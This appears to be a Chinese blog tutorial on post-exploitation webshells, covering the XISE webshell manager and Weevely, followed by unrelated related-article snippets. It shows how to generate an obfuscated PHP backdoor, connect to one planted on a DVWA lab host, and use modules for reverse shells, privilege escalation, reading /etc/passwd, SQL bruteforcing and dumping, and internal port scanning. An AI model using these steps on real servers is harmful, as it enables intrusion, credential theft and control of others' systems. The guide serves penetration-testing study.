文件上传漏洞(七)XISE寄生虫Weevely学习

简介: 文件上传漏洞(七)XISE寄生虫Weevely学习

image.png

XISE简介

XISE WBMS(寄生虫)可以看出是中国菜刀的升 级版,除了支持常规的webshell批量管理、文件 管理和数据库管理之外

支持PHP、ASP、ASPX、JSP不同环境,支持 SEO所需要的批量挂链、批量内页等功能  

支持批量导入txt和菜刀数据库,支持自动上传 shell  

操作使用

批量导入菜刀数据库

image.png

文件管理

image.png

自动上传shell

第一次使用右键点击添加

在已经被控制的web也可以上传自动生成的小马,自动生成的小马也会自动生成链接

image.png

image.png image.png

image.png

Weevely

简介

image.png

Weevely是一种武器化的Web Shell,它是为了后渗tou测试而设计的。它可以在运行时通过网络对其进行扩展。使用Weevely,您可以在没有命令行访问权限的情况下管理远程Web服务器。以下是Weevely的两个用法示例:

生成Weevely PHP代理:

weevely generate <password>

这将生成一个名为weevely.php的PHP文件,您可以将其上传到目标Web服务器上。

连接Weevely PHP代理:

weevely <URL> <password> [cmd]

这将连接到目标Web服务器上的Weevely PHP代理。如果提供了可选的cmd参数,则将在连接后立即执行该命令。

除了支持shell管理之外,还支持文件管理、安全 审计、数据库管理、HTTP代理、内网渗tou

可以根据Weevely API文档,基于Python编写自己 的拓展功能  

地址为: https://github.com/epinna/weevely3

基础使用

安装weevely  

kali linux已集成,在Linux中输入Weevely就得到一下帮助命令

image.png

生成webshell  

weevely generate <password> <path> //加密码加路径

image.png

weevely generate pass123 ~/Desktop/hack2.php  

直接在生成shell文件到桌面

image.png

这款工具只能支持PHP不能支持别的架构

查看Webshell  

cd /usr/share/weevely/  

ls

image.png

more hack.php  

经过混绕编码后的后门

上传Webshell

image.png

连接webshell

weevely <URL> <password> [cmd]

weevely http://172.16.70.214/dvwa/hackable/uploads/hack.php 123456

image.png

功能详解

help

帮助文档命令,可以看到命令提示

image.png

shell

image.png

:shell_php Execute PHP commands.  

:shell_sh Execute Shell  commands.  

:shell_su Elevate privileges with su command.  

:backdoor_reversetcp Execute a reverse TCP shell.  

:backdoor_tcp Spawn a shell on a TCP port.  

审计

image.png

:audit_phpconf Audit PHP configuration.  

:audit_suidsgid Find files with SUID or SGID flags.  

:audit_filesystem Audit system files for wrong permissions.  

:audit_etcpasswd Get /etc/passwd with different techniques.  

系统

image.png

:system_extensions Collect PHP and webserver extension list.  

:system_info Collect system information.  

网络

image.png

:net_phpproxy Install PHP proxy on the target.  

:net_curl Perform a curl-like HTTP request.  

:net_proxy Proxify local HTTP traffic  passing through the target.  

:net_ifconfig Get network interfaces addresses.  

:net_scan TCP Port scan.  

数据库

image.png

:bruteforce_sql Bruteforce SQL database.  

:sql_dump Multi dbms mysqldump replacement.  

:sql_console Execute SQL query or run console.  

文件

image.png

:file_upload2web Upload file automatically to a web folder and get corresponding URL.

:file_upload Upload file to remote filesystem.

:file_read Read remote file from the remote filesystem.

:file_cp Copy single file.

:file_gzip Compress or expand gzip files.

:file_tar Compress or expand tar archives.

:file_enum Check existence and permissions of a list of paths.

:file_ls List directory content.

:file_check Get remote file information.

:file_find Find files with given names and attributes.

:file_download Download file to remote filesystem.

:file_rm Remove remote file.

:file_touch Change file timestamp.

:file_cd Change current working directory.

:file_webdownload Download URL to the filesystem

:file_mount Mount remote filesystem using HTTPfs.

:file_grep Print lines matching a pattern in multiple files.

:file_zip Compress or expand zip files.

:file_bzip2 Compress or expand bzip2 files.

:file_edit Edit remote file on a local  editor.  

虚拟终端

虚拟终端就和我们正常使用Linux一样

ls //查看当前文件夹

uname -a // uname -a命令用于显示所有系统信息,包括内核名称、主机名、内核版本、操作系统类型等等

pwd //pwd是一个Linux命令,用于打印当前工作目录的绝对路径。

cat /etc/passwd //cat /etc/passwd是一个Linux命令,用于查看本地系统上的用户列表。该命令将打印出一个文本文件,其中包含了系统上所有用户的用户名、用户ID、组ID、用户主目录、默认shell等信息。

信息探测  

查看系统信息  

:system_info  //查看系统核心信息

:system_extensions //查看网站安装模块和插件

查看网络信息

说明  

网络信息探测主要用于内网渗透,通过本地主机和网络信息,扫描其他服务器和开放的服务

:net_ifconfig //查看多张网卡

:net_scan  //看看局域网开放端口扫描(基于渗tou机作为跳板进行内网横向)

查看审计信息  

说明

通过审计,了解这个系统的脆弱性,例如不安全 配置、可读性文件、账号信息等  

:audit_filesystem //查看目标服务器有哪些文件是可写入的

:audit_phpconf  //PHP敏感的配置文件

:system_info  //目标操作系统信息

:system_extensions  //查看PHP、阿帕奇拓展文件和插件

网络层面可以使用net

:net_ifconfig // 可以看到网段

:net_scan //指定一个目标网段或ip地址加端口比如1-100端口,扫描开放的端口。也可以跳着写IP地址和端口号,用英文逗号隔开

image.png

文件管理  

:file_upload //本地上传文件

:file_upload2web //上传文件生成shell文件路径

:file_download  //指定肉鸡文件下载到本地

:file_read  //查看一个文件内容















相关文章
|
6月前
|
人工智能 自然语言处理 安全
CodeBuddy 开发本地 PDF 转图工具
市场上的 PDF 转图片工具存在收费昂贵、功能有限、隐私安全风险等痛点,而使用 CodeBuddy 实现的本地 PDF 批量转图片工具可以有效解决这些问题。CodeBuddy 的强大编程能力让我们可以快速开发出满足需求的工具,而且工具可以在本地运行,保证了文件的隐私安全。此外,工具还支持批量处理和自定义功能,提高了工作效率。如果你也有 PDF 转图片的需求,不妨尝试使用 CodeBuddy 来实现一个属于自己的工具。
162 11
|
机器学习/深度学习 存储 自然语言处理
SeACo-Paraformer
【6月更文挑战第14天】
650 6
|
10月前
|
安全 Ubuntu Linux
在DVWA靶机上从渗透到控制(weevely和中国蚁剑)
本文介绍如何使用Weevely工具对Ubuntu系统上的DVWA进行渗透测试,通过上传Webshell获取远程服务器控制权。实验环境为靶机IP 192.168.1.37(DVWA低安全等级)和攻击机Kali Linux IP 10.211.55.29。详细步骤包括Weevely安装、Webshell生成与上传、命令执行及提权尝试,并结合中国蚁剑进一步操作。文中强调合法授权和隐蔽性的重要性。
661 0
在DVWA靶机上从渗透到控制(weevely和中国蚁剑)
|
安全 Java Linux
Kali渗透测试:通过Web应用程序实现远程控制
Kali渗透测试:通过Web应用程序实现远程控制
249 0
|
12月前
|
关系型数据库 MySQL 索引
MySQL的group by与count(), *字段使用问题
正确使用 `GROUP BY`和 `COUNT()`函数是进行数据聚合查询的基础。通过理解它们的用法和常见问题,可以有效避免查询错误和性能问题。无论是在单列分组、多列分组还是结合其他聚合函数的场景中,掌握这些技巧和注意事项都能大大提升数据查询和分析的效率。
997 0
|
SQL 关系型数据库 MySQL
MySQL中常用的操作语句已汇总
MySQL中常用的操作语句已汇总
334 1
|
监控 Java 测试技术
代码更新不停机:Spring Boot应用实现零停机更新的新质生产力
【8月更文挑战第14天】在快节奏的软件开发与运维环境中,应用的持续部署与更新成为了提升竞争力的关键。传统的停机更新方式不仅影响用户体验,还可能造成业务中断和数据丢失。因此,实现Spring Boot应用的零停机更新成为了现代软件开发团队追求的目标。本文将深入探讨如何通过一系列技术和策略,在不影响服务可用性的前提下,实现Spring Boot应用的平滑升级。
1167 2
|
机器学习/深度学习 自然语言处理 PyTorch
Transformer 自然语言处理(一)
Transformer 自然语言处理(一)
465 0
Transformer 自然语言处理(一)
|
SQL 安全 关系型数据库
BUUCTF:Web 解析(一)
BUUCTF:Web 解析(一)
|
搜索推荐 物联网 5G
下一篇
开通oss服务